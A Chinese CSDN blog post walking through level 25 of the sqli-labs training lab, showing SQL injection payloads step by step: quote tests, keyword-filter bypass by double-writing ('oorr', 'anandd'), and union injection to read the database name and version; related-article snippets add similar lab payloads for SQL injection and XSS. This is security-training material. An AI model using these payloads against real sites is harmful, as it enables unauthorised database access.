sqlalb第二十五关通关笔记

最新推荐文章于 2024-07-25 14:12:59 发布
最新推荐文章于 2024-07-25 14:12:59 发布
阅读量397 收藏 1
点赞数 7
文章标签: 笔记 sqllab
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/I_WORM/article/details/136764758
版权
文章讲述了在Web应用中识别和利用SQL注入漏洞的过程,包括字符型注入的利用、关键字过滤的应对策略,以及如何通过联合注入获取数据库名和版本信息。
摘要由CSDN通过智能技术生成

知识点:

  • or and # 被过滤了
  • 有回显可以用联合注入
  • 这里可以利用双写绕过(亲测有效,)
    • oorr
    • anandd
    • 这样的话可以使用错误注入(不演示了,有兴趣可以试一下)

又是一个id输入

测试是什么类型的注入

构造payload:id=1

构造payload:id=1/0

构造payload:id=1'

构造payload:id=1''

发现界面是有输出的,同时界面提示了or and等关键字应该是要过滤的,并且下面给出了过滤后的信息;经过不断的测试发现,这是一个字符型注入

构造payload:id=1'+or+1=1#

发现报错了,果然or and 关键字被过滤了

使用联合注入试一下

构造payload:id=0'+union+select+1,2,3#

发现界面错误,看下面的提示发现#被过滤了;其实上面测试的时候就发现了,这里就是按照一般思路测试一下,在不知道什么过滤的条件下需要一步步测试;根据提示发现一直提示单引号问题就能猜出#注释没有发挥作用

构造payload:id=0'+union+select+1,2,3+--+

成功显示了内容

接下来获取数据库名和版本信息

构造payload:id=0'+union+select+1,version(),database()+--+

成功获取了数据库名和版本信息,这里就结束了,收工

10

I_WORM
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
DVWA 共12通关笔记
09-12
【DVWA 共12通关笔记】 DVWA(Damn Vulnerable Web Application)是一个用于网络安全教育的开源Web应用程序。它包含各种安全漏洞,为初学者和专业人士提供了实践和学习Web安全漏洞的机会。DVWA分为多个级别,从低...
愤怒的小鸟水煮蛋1-15通关录像.mp4
05-13
愤怒的小鸟水煮蛋1-15通关录像
sql-labs通关笔记
jilinyi的博客
07-03 813
输入-admin' union select database(),(select group_concat(table_name) from information_schema.tables where table_schema='security')-- +可得到'security'数据库下存在'emails'、'referers'、'uagent'、'users'表。与第13类似,只需将注入语句中的admin') or 1=1-- +更改为admin" or 1=1-- +即可,后续操作相同。
XSS闯小游戏通关笔记
skynet_x的博客
10-29 1183
level1 — 无过滤 查看源码,没有任何的过滤。 直接在链接中构造最基本的XSS弹窗即可,弹窗内容为123. <script>alert(123)</script> level2 — input中未设置过滤 查看源码,发现在echo输出中有一个函数htmlspecialchars() htmlspecialchars() 函数把预定义的字符转换为 HTML 实体。可以看成是对特定字符的过滤。 预定义的字符是: & (和号)成为 & " (双引号)成为 "
sqli-labs靶场15-19通关笔记中总结
weixin_45585955的博客
04-16 3824
第十五属于时间注入,基于源码分析,闭合字符是单引号。 本没有错误提示,那么我们只能靠猜测进行注入。这里我直接从源代码中看到了 sql语句。 那这里对 id 进行 ‘ id’ 的处理。 本我们利用延时注入进行。 uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit 正确的时候可以直接登录,不正确的时候这里会延时 5 秒。 第十六
polar靶场通关笔记
weixin_43296565的博客
06-06 5262
这里是于自己打polar靶场的小笔记
XSS靶场——通关笔记
2301_80358831的博客
07-11 1186
通过代码发现,本卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。先查看源代码,和上一的不同之处是t_ua处已经有了参数,虽然第四个<input>的t_ua已经有了参数,但是仍然尝试给这四个隐藏的文本框传参,结果发现t_sort成功接收到传的参,但是t_ua还是原来的参数,没有接收到刚才传的参。
Sqli-Labs 通关笔记
m0_43397796的博客
08-07 2429
Sqli-Labs靶场
XSS_Labs靶场通关笔记
I_WORM的博客
01-26 653
每一的方法不唯一;可以结合源码进行分析后构造payload;通关技巧(四步):1.输入内容看源码变化;2.找到内容插入点;3.测试是否有过滤;4.构造payload绕过。
xss-labs-master 第十一到第十五通关
three_year的博客
10-06 1521
xss-labs-master 第一到第五通关 xss-labs-master 第六到第十通关 Level 11 进入十一发现与第十相似,所以直接查看网页源代码 发现比第十多了个隐藏域,看到名称就想起了HTTP请求中的Referer头,所以使用BurpSuite抓一下包查看一下 发现并没有Refeer头 把拦截到的请求包发送到Repeater模块中,然后自己添加一个Referer头上去,可以看到响应中的t_ref中的值为script Onon,也就是说大小于号都被过滤了,接着使用第十题的解
Upload-labs 1-21 靶场通关笔记(含代码审计)
weixin_54894046的博客
10-15 8017
Upload-labs 1-21 靶场通关笔记(含代码审计)
松鼠大战1第E通关录像.mp4
09-14
松鼠大战1第E通关录像
松鼠大战1第D通关录像.mp4
09-13
松鼠大战1第D通关录像
松鼠大战1第C通关录像.mp4
09-12
松鼠大战1第C通关录像
deepseek-vl 论文阅读笔记
samoyan的博客,记录技术成长~
07-22 1225
我们的语言模型基于DeepSeek LLM(DeepSeek-AI,2024),其微设计大体遵循LLaMA(Touvron等,2023a,b)的设计,采用带有RMSNorm(Zhang和Sennrich,2019)函数的Pre-Norm结构,并使用SwiGLU(Shazeer,2020)作为前馈网络(FFN)的激活函数,中间层维度为8/3模型维度。此外,我们引入了一种新的“模态预热”策略。为了促进创新并支持广泛的应用需求,我们公开了两个版本的模型,分别为1.3B和7B,以满足不同计算能力的需求。
vite5+vue3开发阅读APP实战笔记20240725
Python私教
07-25 394
修改src/page/home/index.vue,使用组件和API。注意,这里无论是组件还是API,都不需要我们手动引入,我们配置了自动导入以后,vite会帮我们自动导入。创建 src/page/home/index.vue。修改 vite.config.js。修改vite.config.js。修改 src/main.js。修改src/App.vue。
Golang学习笔记20240725,Go语言基础语法
最新发布
Python私教
07-25 531
如果我们在遍历的时候,不想要key或者value,也可以用下划线替代,下划线叫做匿名变量。go语言里面的switch语句每个case天生就是独立的,不需要加break。指针可以直接对内存地址进行操作。使用*表示指针,使用&取地址。切片在go语言里面非常常用,因为其有动态扩展的特性。运行方式3:goland右键运行。使用加号可以对字符串进行拼接。
学习笔记-系统框图传递函数公式推导
weixin_45875994的博客
07-24 799
输出C(s)是前向路径(通过G(s))的输出与反馈路径(通过H(s))的输出之差(在负反馈系统中)。因此,我们可以写出以下系式:这里,G(s)R(s)是前向路径的输出,而G(s)H(s)C(s)是反馈路径的输出(注意,反馈路径的输出先经过H(s),再与前向路径的输出相减)。
upload-labs19通关
07-28
根据引用\[1\]中的内容,通关upload-labs的第19的方法如下: 1. 打开18的myupload.php文件,进行修改,确保上传的图片可以放到upload文件夹下。 2. 与第17类似,这还会检测文件的后缀名,所以需要上传一个图片马,而不是直接上传php文件。 3. 上传一个名为22.gif的图片,并进行抓包。 4. 进行与第17相似的攻击过程,点击"Start Attack"按钮。 5. 完成以上步骤后,即可成功通关第19。 以上是通关upload-labs第19的方法。根据引用\[2\]中的内容,这些方法在实战中可能会有所不同,但基本原理是相似的。希望这些方法能对你的学习有所帮助。 #### 引用[.reference_title] - *1* *2* [upload-labs详解1-19通关全解(最全最详细一看就会)](https://blog.csdn.net/qq_53003652/article/details/129969951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [upload-labs通关](https://blog.csdn.net/as604049322/article/details/127418017)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

I_WORM

大佬们,赏点儿碎银吧~~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值